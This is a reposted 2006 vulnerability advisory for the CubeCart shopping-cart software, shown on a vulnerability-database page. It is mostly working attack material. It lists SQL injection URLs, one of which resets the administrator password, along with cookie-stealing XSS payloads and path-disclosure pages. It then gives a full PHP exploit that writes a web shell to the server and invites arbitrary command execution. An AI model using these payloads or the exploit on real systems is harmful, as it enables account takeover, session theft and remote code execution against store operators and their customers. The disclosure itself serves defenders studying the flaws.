Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14444
HistorySep 27, 2006 - 12:00 a.m.

CubeCart Multiple input Validation vulnerabilities

2006-09-2700:00:00
vulners.com
43
JSON

Hello,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

Sql injection

admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
it will reset the password for the administrator

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

view_doc.php?view_doc=-1'%20union%20select%201,2/*

admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
xss
admin/print_order.php?order_id=<script>alert(document.cookie);</script>

view_order.php?order_id=<script>alert(document.cookie);</script>

admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
and language variables for this file …

admin/image.php?image=<script>alert(document.cookie);</script>

admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
and all other variables in this file

footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>

header.inc.php?site_name=</title><script>alert(document.cookie);</script>
and all other variables in the file.

/***************************************/

Full path

information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X and maybe other versions are injected
/
print_r('
//
/ CubeCart Remote sql injection exploit /
/ by HACKERS PAL <[email protected]> /
/ site: http://www.soqor.net /');
if ($argc<2) {
print_r('
//
/ Usage: php '.$argv[0].' host
/ Example: /
/ php '.$argv[0].' http://localhost/CubeCart/
/***/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit1="/cat_navi.php";
Function get_page($url)
{

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }

 $page = get_page&#40;$url.$exploit1&#41;;

         $pa=explode&#40;&quot;&lt;b&gt;&quot;,$page&#41;;
         $pa=explode&#40;&quot;&lt;/b&gt;&quot;,$pa[2]&#41;;
         $path = str_replace&#40;&quot;cat_navi.php&quot;,&quot;&quot;,$pa[0]&#41;.&quot;soqor.php&quot;;
         $var=&#39;&#92; &#39;;
         $var  = str_replace&#40;&quot; &quot;,&quot;&quot;,$var&#41;;
         $path = str_replace&#40;$var,&quot;/&quot;,$path&#41;;
         $exploit2=&quot;/view_doc.php?view_doc=-1&#39;&#37;20union&#37;20select&#37;20&#39;&lt;?php&#37;20system&#40;&quot;.&#39;$_GET[cmd]&#39;.&quot;&#41;;&#37;20?&gt;&#39;,&#39;WwW.SoQoR.NeT&#39;&#37;20INTO&#37;20OUTFILE&#37;20&#39;$path&#39;&#37;20from&#37;20store_docs/*&quot;;
 $page_now = get_page&#40;$url.$exploit2&#41;;
 if&#40;ereg&#40;&quot;mysql_fetch_array&#40;&#41;&quot;,$page_now&#41;&#41;
 {
      $newurl=$url.&quot;/soqor.php?cmd=id&quot;;
      Echo &quot;&#92;n[+] Go TO &quot;.str_replace&#40;&quot;//&quot;,&quot;/&quot;,$newurl&#41;.&quot;&#92;n[+] Change id to any command you want :&#41;&quot;;
 }
 else
 {
      Echo &quot;&#92;n[-] Exploit Faild&quot;;
 }
 Die&#40;&quot;&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;

?>

#WwW.SoQoR.NeT

JSON